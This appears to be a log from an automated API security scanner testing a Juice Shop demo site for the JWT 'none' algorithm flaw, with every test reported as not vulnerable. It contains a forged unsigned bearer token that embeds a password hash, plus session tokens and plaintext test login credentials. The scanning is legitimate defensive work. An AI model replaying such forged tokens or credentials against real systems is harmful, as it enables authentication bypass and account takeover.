Test: NO_AUTH JWT_NONE_ALGO Vulnerable: false
Original request : {"Origin":"https://juiceshop.akto.io","Cookie":"language=en; welcomebanner_status=dismiss; cookieconsent_status=dismiss; continueCode=v7BmaPZbQ7NroLqvm1YzMVnwOBAVkTefndgpE5jkJlXey43R68K2D9xWNQgq","Accept":"application/json, text/plain, */*","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36","Referer":"https://juiceshop.akto.io/","Connection":"close","Sec-Fetch-Site":"same-origin","Sec-Fetch-Dest":"empty","Host":"juiceshop.akto.io","Accept-Encoding":"gzip, deflate","Sec-Fetch-Mode":"cors","sec-ch-ua":"\"Not A(Brand\";v=\"24\", \"Chromium\";v=\"110\"","sec-ch-ua-mobile":"?0","sec-ch-ua-platform":"\"macOS\"","Accept-Language":"en-GB,en-US;q=0.9,en;q=0.8","Content-Length":"51","Content-Type":"application/json"}
{"email":"victim@gmail.com","password":"victim123"}
Original response: {"X-Frame-Options":"SAMEORIGIN","X-Recruiting":"/#/jobs","Access-Control-Allow-Origin":"*","ETag":"W/\"33a-CNP0uzn0+OgghHzsSNi62nRjeIw\"","X-Content-Type-Options":"nosniff","Connection":"close","Feature-Policy":"payment 'self'","Vary":"Accept-Encoding","Content-Length":"826","Date":"Thu, 09 Mar 2023 14:50:30 GMT","Content-Type":"application/json; charset=utf-8"}
{"authentication":{"token":"eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.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.JYBu5fv--c9xic_A3yLhvcy2p5o6YjvsVSDnDJ8f5x5cFq5MBfm-Q3a9PrkzFk37QI9nkAsCHXp7lOOdI72sUjHyqZiBu3PT7XzOQmkf8G3D0QZn51oX-bzCEDKbprFoBi5a14duxQvuGhHakoK1La9x8Dgz0SQikeAEsDH6xzo","bid":6,"umail":"victim@gmail.com"}}
Attempted errors :
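Error 1: Request API failed to satisfy api_selection_filters block, skipping execution (no attempted request is recorded for this API, so "Vulnerable: false" above marks a skipped test, not a token with alg "none" that the server rejected)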
------------------------------------
API: https://juiceshop.akto.io/rest/user/whoami GET
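Test: NO_AUTH JWT_NONE_ALGO Vulnerable: false (the attempted request below kept the original If-None-Match header and received a 304 with an empty body, so there was no response body to compare; the returned ETag equals the If-None-Match value and differs from the ETag of the original authenticated response)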
Original request : {"Cookie":"language=en; welcomebanner_status=dismiss; cookieconsent_status=dismiss; continueCode=v7BmaPZbQ7NroLqvm1YzMVnwOBAVkTefndgpE5jkJlXey43R68K2D9xWNQgq; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.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.JYBu5fv--c9xic_A3yLhvcy2p5o6YjvsVSDnDJ8f5x5cFq5MBfm-Q3a9PrkzFk37QI9nkAsCHXp7lOOdI72sUjHyqZiBu3PT7XzOQmkf8G3D0QZn51oX-bzCEDKbprFoBi5a14duxQvuGhHakoK1La9x8Dgz0SQikeAEsDH6xzo","Accept":"application/json, text/plain, */*","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36","Referer":"https://juiceshop.akto.io/","Connection":"close","Sec-Fetch-Site":"same-origin","Sec-Fetch-Dest":"empty","Host":"juiceshop.akto.io","Accept-Encoding":"gzip, deflate","Sec-Fetch-Mode":"cors","Authorization":"Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.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.bUvn24at2rOcuht5hto8QHl7pXdanuLKQDBxqH2MWG2-mMEI8LgWm1R9HhUD209dHL93Ks52KijKJFOlF_5Z3-v47jY-Rf73wcA_Le69-n7EudWwrc_X6EGpNiqovVYm31RZQnU2Q_H-PtzpnzNIOnfE6z_p023acrke-cZkKss","If-None-Match":"W/\"b-/5bSboVjVhGw3qRgvUfZjE1r1Ns\"","sec-ch-ua":"\"Not A(Brand\";v=\"24\", \"Chromium\";v=\"110\"","sec-ch-ua-mobile":"?0","sec-ch-ua-platform":"\"macOS\"","Accept-Language":"en-GB,en-US;q=0.9,en;q=0.8"}
Original response: {"X-Frame-Options":"SAMEORIGIN","X-Recruiting":"/#/jobs","Access-Control-Allow-Origin":"*","ETag":"W/\"78-S3rk6VU9KtrbK5QloaXlT4AKH2s\"","X-Content-Type-Options":"nosniff","Connection":"close","Feature-Policy":"payment 'self'","Vary":"Accept-Encoding","Content-Length":"120","Date":"Thu, 09 Mar 2023 14:50:30 GMT","Content-Type":"application/json; charset=utf-8"}
{"user":{"id":21,"email":"victim@gmail.com","lastLoginIp":"","profileImage":"assets/public/images/uploads/default.svg"}}
Attempted request : {url=https://juiceshop.akto.io/rest/user/whoami, method=GET, type=HTTP/1.1, queryParams=null, body=, headers={"sec-fetch-mode":"cors","if-none-match":"W/\"b-/5bSboVjVhGw3qRgvUfZjE1r1Ns\"","sec-fetch-site":"same-origin","cookie":"language=en; welcomebanner_status=dismiss; cookieconsent_status=dismiss; continueCode=v7BmaPZbQ7NroLqvm1YzMVnwOBAVkTefndgpE5jkJlXey43R68K2D9xWNQgq; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.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.JYBu5fv--c9xic_A3yLhvcy2p5o6YjvsVSDnDJ8f5x5cFq5MBfm-Q3a9PrkzFk37QI9nkAsCHXp7lOOdI72sUjHyqZiBu3PT7XzOQmkf8G3D0QZn51oX-bzCEDKbprFoBi5a14duxQvuGhHakoK1La9x8Dgz0SQikeAEsDH6xzo","accept-language":"en-GB,en-US;q=0.9,en;q=0.8","x-akto-ignore":"0","accept":"application/json, text/plain, */*","authorization":"Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6MjEsInVzZXJuYW1lIjoidmljdGltIiwiZW1haWwiOiJ2aWN0aW1AZ21haWwuY29tIiwicGFzc3dvcmQiOiJhNjJlN2JlMGE1NjQwODFiNmE5Zjc1MzA4MjA4YzQzMyIsInJvbGUiOiJjdXN0b21lciIsImRlbHV4ZVRva2VuIjoiIiwibGFzdExvZ2luSXAiOiIiLCJwcm9maWxlSW1hZ2UiOiJhc3NldHMvcHVibGljL2ltYWdlcy91cGxvYWRzL2RlZmF1bHQuc3ZnIiwidG90cFNlY3JldCI6IiIsImlzQWN0aXZlIjp0cnVlLCJjcmVhdGVkQXQiOiIyMDIzLTAzLTEwIDA1OjM5OjE4LjI5OSArMDA6MDAiLCJ1cGRhdGVkQXQiOiIyMDIzLTAzLTEwIDA1OjM5OjE4LjI5OSArMDA6MDAiLCJkZWxldGVkQXQiOm51bGx9LCJpYXQiOjE2Nzg0MjY4NjUsImV4cCI6MTk5Mzc4Njg2NX0.","sec-ch-ua":"\"Not A(Brand\";v=\"24\", \"Chromium\";v=\"110\"","sec-ch-ua-mobile":"?0","sec-ch-ua-platform":"\"macOS\"","host":"juiceshop.akto.io","connection":"close","accept-encoding":"gzip, deflate","user-agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36","sec-fetch-dest":"empty"}}
Attempted response: {statusCode=304.0, body=, headers={"date":"Fri, 29 Sep 2023 08:58:24 GMT","access-control-allow-origin":"*","x-content-type-options":"nosniff","x-recruiting":"/#/jobs","x-frame-options":"SAMEORIGIN","etag":"W/\"b-/5bSboVjVhGw3qRgvUfZjE1r1Ns\"","feature-policy":"payment 'self'"}}
------------------------------------
API: https://juiceshop.akto.io/socket.io/ GET
Test: NO_AUTH JWT_NONE_ALGO Vulnerable: false
Original request : {"Cookie":"language=en; welcomebanner_status=dismiss; cookieconsent_status=dismiss; continueCode=v7BmaPZbQ7NroLqvm1YzMVnwOBAVkTefndgpE5jkJlXey43R68K2D9xWNQgq","Accept":"*/*","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36","Referer":"https://juiceshop.akto.io/","Connection":"close","Sec-Fetch-Site":"same-origin","Sec-Fetch-Dest":"empty","Host":"juiceshop.akto.io","Accept-Encoding":"gzip, deflate","Sec-Fetch-Mode":"cors","sec-ch-ua":"\"Not A(Brand\";v=\"24\", \"Chromium\";v=\"110\"","sec-ch-ua-mobile":"?0","sec-ch-ua-platform":"\"macOS\"","Accept-Language":"en-GB,en-US;q=0.9,en;q=0.8"}
Original response: {"Connection":"close","Content-Length":"1","Date":"Thu, 09 Mar 2023 14:48:39 GMT","Content-Type":"text/plain; charset=UTF-8"}
6
Attempted errors :
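Error 1: Request API failed to satisfy api_selection_filters block, skipping execution (no attempted request is recorded for this API, so "Vulnerable: false" above marks a skipped test, not a token with alg "none" that the server rejected)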
------------------------------------
API: https://juiceshop.akto.io/socket.io/ POST
Test: NO_AUTH JWT_NONE_ALGO Vulnerable: false
Original request : {"Origin":"https://juiceshop.akto.io","Cookie":"language=en; welcomebanner_status=dismiss; cookieconsent_status=dismiss; continueCode=v7BmaPZbQ7NroLqvm1YzMVnwOBAVkTefndgpE5jkJlXey43R68K2D9xWNQgq","Accept":"*/*","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36","Referer":"https://juiceshop.akto.io/","Connection":"close","Sec-Fetch-Site":"same-origin","Sec-Fetch-Dest":"empty","Host":"juiceshop.akto.io","Accept-Encoding":"gzip, deflate","Sec-Fetch-Mode":"cors","Content-type":"text/plain;charset=UTF-8","sec-ch-ua":"\"Not A(Brand\";v=\"24\", \"Chromium\";v=\"110\"","sec-ch-ua-mobile":"?0","sec-ch-ua-platform":"\"macOS\"","Accept-Language":"en-GB,en-US;q=0.9,en;q=0.8","Content-Length":"2"}
40
Original response: {"Connection":"close","Content-Length":"2","Date":"Thu, 09 Mar 2023 14:48:39 GMT","Content-Type":"text/html"}
ok
Attempted errors :
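Error 1: Request API failed to satisfy api_selection_filters block, skipping execution (no attempted request is recorded for this API, so "Vulnerable: false" above marks a skipped test, not a token with alg "none" that the server rejected)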
------------------------------------